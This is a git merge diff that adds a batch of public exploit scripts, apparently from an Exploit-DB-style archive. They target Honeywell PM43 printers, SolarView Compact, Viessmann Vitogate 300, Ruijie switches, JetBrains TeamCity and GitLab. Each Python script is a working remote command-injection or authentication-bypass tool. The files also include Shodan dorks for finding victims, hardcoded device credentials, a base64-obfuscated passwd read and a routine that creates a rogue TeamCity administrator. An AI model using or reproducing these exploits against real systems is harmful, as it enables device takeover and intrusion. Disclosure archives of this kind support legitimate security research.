Merge remote-tracking branch 'upstream/main'

exploits/hardware/remote/51885.py

@@ -0,0 +1,57 @@
+#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
+#- Shodan Dork: http.title:PM43 , PM43
+#- Exploit Author: ByteHunter
+#- Email: 0xByteHunter@proton.me
+#- Frimware Version: versions prior to P10.19.050004
+#- Tested on: P10.17.019667
+#- CVE : CVE-2023-3710
+
+
+import requests
+import argparse
+
+BLUE = '\033[94m'
+YELLOW = '\033[93m'
+RESET = '\033[0m'
+
+def banner():
+    banner = """
+    ╔════════════════════════════════════════════════╗
+        CVE-2023-3710
+        Command Injection in Honeywell PM43 Printers
+        Author: ByteHunter
+    ╚════════════════════════════════════════════════╝
+    """
+    print(YELLOW + banner + RESET)
+
+
+def run_command(url, command):
+    full_url = f"{url}/loadfile.lp?pageid=Configure"
+    payload = {
+        'username': f'hunt\n{command}\n',
+        'userpassword': 'admin12345admin!!'
+    }
+    try:
+        response = requests.post(full_url, data=payload, verify=False)
+        response_text = response.text
+        html_start_index = response_text.find('<html>')
+        if html_start_index != -1:
+            return response_text[:html_start_index]
+        else:
+            return response_text
+    except requests.exceptions.RequestException as e:
+        return f"Error: {e}"
+
+def main():
+    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
+    parser.add_argument('--url', dest='url', help='Target URL', required=True)
+    parser.add_argument('--run', dest='command', help='Command to execute', required=True)
+
+    args = parser.parse_args()
+
+    response = run_command(args.url, args.command)
+    print(f"{BLUE}{response}{RESET}")
+
+if __name__ == "__main__":
+    banner()
+    main()

exploits/hardware/remote/51886.py

@@ -0,0 +1,39 @@
+#- Exploit Title: SolarView Compact 6.00 - Command Injection
+#- Shodan Dork: http.html:"solarview compact"
+#- Exploit Author: ByteHunter
+#- Email: 0xByteHunter@proton.me
+#- Version: 6.00
+#- Tested on: 6.00
+#- CVE : CVE-2023-23333
+
+
+import argparse
+import requests
+
+def vuln_check(ip_address, port):
+    url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
+    response = requests.get(url)
+    if response.status_code == 200:
+        output = response.text
+        if "root" in output:
+            print("Vulnerability detected: Command Injection possible.")
+            print(f"passwd file content:\n{response.text}")
+
+
+        else:
+            print("No vulnerability detected.")
+    else:
+        print("Error: Unable to fetch response.")
+
+def main():
+    parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
+    parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
+    parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
+    args = parser.parse_args()
+
+    ip_address = args.ip
+    port = args.port
+    vuln_check(ip_address, port)
+
+if __name__ == "__main__":
+    main()

exploits/hardware/remote/51887.py

@@ -0,0 +1,78 @@
+#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
+#- Shodan Dork: http.title:'Vitogate 300'
+#- Exploit Author: ByteHunter
+#- Email: 0xByteHunter@proton.me
+#- Version: versions up to 2.1.3.0
+#- Tested on: 2.1.1.0
+#- CVE : CVE-2023-5702 & CVE-2023-5222
+
+
+import argparse
+import requests
+
+def banner():
+    banner = """
+    ╔═══════════════════════════════════╗
+             CVE-2023-5702
+           Vitogate 300 RCE
+           Author: ByteHunter
+    ╚═══════════════════════════════════╝
+    """
+
+    print(banner)
+
+
+def send_post_request(target_ip, command, target_port):
+    payload = {
+        "method": "put",
+        "form": "form-4-7",
+        "session": "",
+        "params": {
+            "ipaddr": f"1;{command}"
+        }
+    }
+
+    headers = {
+        "Host": target_ip,
+        "Content-Length": str(len(str(payload))),
+        "Content-Type": "application/json"
+    }
+
+    url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"
+
+
+    response = requests.post(url, json=payload, headers=headers)
+
+    if response.status_code == 200:
+        print("Result:")
+        print(response.text)
+    else:
+        print(f"Request failed! status code: {response.status_code}")
+
+def main():
+    parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
+    parser.add_argument("--target", required=False, help="Target IP address")
+    parser.add_argument("--port", required=False, help="Target port",default="80")
+    parser.add_argument("--command", required=False, help="Command")
+    parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")
+
+    args = parser.parse_args()
+
+    if args.creds:
+        print("Vitogate 300 hardcoded administrative accounts credentials")
+        print("Username: vitomaster, Password: viessmann1917")
+        print("Username: vitogate, Password: viessmann")
+    else:
+        target_ip = args.target
+        target_port = args.port
+        command = args.command
+
+        if not (target_ip and command):
+            print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
+            return
+
+        send_post_request(target_ip, command,target_port)
+
+if __name__ == "__main__":
+    banner()
+    main()

exploits/hardware/remote/51888.py

@@ -0,0 +1,55 @@
+#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
+#- Shodan Dork: http.html_hash:-1402735717
+#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
+#- Exploit Author: ByteHunter
+#- Email: 0xByteHunter@proton.me
+#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
+#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
+
+import http.client
+import argparse
+
+def send_request(ip, port, command):
+    headers = {
+        "Host": f"{ip}:{port}",
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+        "Accept-Language": "en-US,en;q=0.5",
+        "Accept-Encoding": "gzip, deflate, br",
+        "DNT": "1",
+        "Connection": "close",
+        "Upgrade-Insecure-Requests": "1",
+        "Cmdnum": "1",
+        "Confirm1": "n",
+        "Content-Length": "0",
+        "Command1": command
+    }
+
+    try:
+        connection = http.client.HTTPConnection(f"{ip}:{port}")
+        connection.request("GET", "/EXCU_SHELL", headers=headers)
+        response = connection.getresponse()
+
+
+        print(f"Status Code: {response.status}")
+        print(response.read().decode('utf-8'))
+        connection.close()
+
+    except Exception as e:
+        print(f"Request failed: {e}")
+
+if __name__ == "__main__":
+
+    parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
+    parser.add_argument('--ip', help='Target IP address', required=True)
+    parser.add_argument('--port', help='Port', required=True)
+    parser.add_argument('--cmd', help='Command', required=True)
+    args = parser.parse_args()
+
+
+    ip = args.ip
+    port = args.port
+    command = args.cmd
+
+
+    send_request(ip, port, command)

exploits/java/remote/51884.py

@@ -0,0 +1,107 @@
+#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)
+#- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648
+#- Exploit Author: ByteHunter
+#- Vendor: JetBrains
+#- Email: 0xByteHunter@proton.me
+#- vendor: JetBrains
+#- Version: versions before 2023.05.4
+#- Tested on: 2023.05.3
+#- CVE : CVE-2023-42793
+
+import requests
+import argparse
+import re
+import random
+import string
+import subprocess
+
+
+banner = """
+=====================================================
+*       CVE-2023-42793                              *
+*  TeamCity Admin Account Creation                  *
+*                                                   *
+*  Author: ByteHunter                               *
+=====================================================
+"""
+
+print(banner)
+parser = argparse.ArgumentParser(description="CVE-2023-42793 - TeamCity JetBrains PoC")
+parser.add_argument("-u", "--url", required=True, help="Target URL")
+parser.add_argument("-v", "--verbose", action="store_true", help="verbose mode")
+args = parser.parse_args()
+
+url = args.url
+
+if url.startswith("https://"):
+    curl_command = "curl -k"
+else:
+    curl_command = "curl"
+
+get_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"
+delete_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"
+create_user_url = f"{url}/app/rest/users"
+
+create_user_command = ""
+token = ""
+
+response = requests.post(get_token_url, verify=False)
+if response.status_code == 200:
+    match = re.search(r'value="([^"]+)"', response.text)
+    if match:
+        token = match.group(1)
+        print(f"Token: {token}")
+    else:
+        print("Token not found in the response")
+
+elif response.status_code == 404:
+    print("Token already exists")
+    delete_command = f'{curl_command} -X DELETE {delete_token_url}'
+    delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+    delete_process.wait()
+    delete_output = delete_process.communicate()
+    if delete_process.returncode == 0:
+        print("Previous token deleted successfully\nrun this command again for creating new token & admin user.")
+    else:
+        print("Failed to delete the previous token")
+elif response.status_code == 400:
+    print("Token already exists")
+    delete_command = f'{curl_command} -X DELETE {delete_token_url}'
+    delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+    delete_process.wait()
+    delete_output = delete_process.communicate()
+    if delete_process.returncode == 0:
+        print("Previous token deleted successfully\nrun this command again for creating new token & admin user.")
+    else:
+        print("Failed to delete the previous token")
+else:
+    print("Failed to get a token")
+
+if token:
+    headers = {
+        "Authorization": f"Bearer {token}",
+        "Content-Type": "application/json"
+    }
+    random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4))
+    username = f"city_admin{random_chars}"
+    data = {
+        "username": username,
+        "password": "Main_password!!**",
+        "email": "angry-admin@funnybunny.org",
+        "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}
+    }
+    create_user_command = f'{curl_command} --path-as-is -H "Authorization: Bearer {token}" -X POST {create_user_url} -H "Content-Type: application/json" --data \'{{"username": "{username}", "password": "theSecretPass!", "email": "nest@nest", "roles": {{"role": [{{"roleId": "SYSTEM_ADMIN", "scope": "g"}}]}}}}\''
+    create_user_response = requests.post(create_user_url, headers=headers, json=data)
+    if create_user_response.status_code == 200:
+        print("Successfully exploited!")
+        print(f"URL: {url}")
+        print(f"Username: {username}")
+        print("Password: Main_password!!**")
+    else:
+        print("Failed to create new admin user")
+
+if args.verbose:
+    if response.status_code == 400:
+        pass
+    else:
+        print(f"Final curl command: {create_user_command}")

exploits/java/remote/51889.txt

@@ -0,0 +1,12 @@
+# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
+# Exploit Author: Sebastian Kriesten (0xB455)
+# Twitter: https://twitter.com/0xB455
+
+# Date: 2024-01-12
+# Vendor Homepage: gitlab.com
+# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
+# Version: <16.7.2, <16.6.4, <16.5.6
+# CVE: CVE-2023-7028
+
+Proof of Concept:
+user[email][]=valid@email.com&user[email][]=attacker@email.com